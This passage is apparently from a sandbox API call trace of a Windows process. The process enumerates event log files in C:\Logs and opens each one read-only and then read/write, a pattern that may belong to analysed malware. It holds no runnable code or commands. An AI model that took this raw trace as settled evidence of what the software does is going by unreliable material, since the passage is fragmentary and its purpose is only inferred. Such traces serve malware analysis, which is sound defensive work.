"c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.419] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.419] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0086.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0086.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0086.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0086.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0086.420] AreFileApisANSI () returned 1 [0086.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpUsedDefaultChar=0x0) returned 72 [0086.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0086.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.420] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0086.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.420] AreFileApisANSI () returned 1 [0086.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0086.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0086.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=72 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 72 [0086.420] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.420] GetFileType (hFile=0x348) returned 0x1 [0086.420] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0086.421] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.421] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.421] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.421] CloseHandle (hObject=0x348) returned 1 [0086.421] AreFileApisANSI () returned 1 [0086.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0086.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0086.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 72 [0086.421] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.421] GetFileType (hFile=0x348) returned 0x1 [0086.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0086.544] CloseHandle (hObject=0x348) returned 1 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.544] AreFileApisANSI () returned 1 [0086.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0086.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0086.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 72 [0086.544] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0086.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.545] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0086.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0086.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0086.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0086.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.546] AreFileApisANSI () returned 1 [0086.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpUsedDefaultChar=0x0) returned 58 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0086.546] AreFileApisANSI () returned 1 [0086.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a630 [0086.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 58 [0086.546] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.547] GetFileType (hFile=0x348) returned 0x1 [0086.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0086.547] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.547] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.547] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.547] CloseHandle (hObject=0x348) returned 1 [0086.548] AreFileApisANSI () returned 1 [0086.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 58 [0086.548] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.548] GetFileType (hFile=0x348) returned 0x1 [0086.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.548] CloseHandle (hObject=0x348) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.549] AreFileApisANSI () returned 1 [0086.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0086.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 58 [0086.549] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 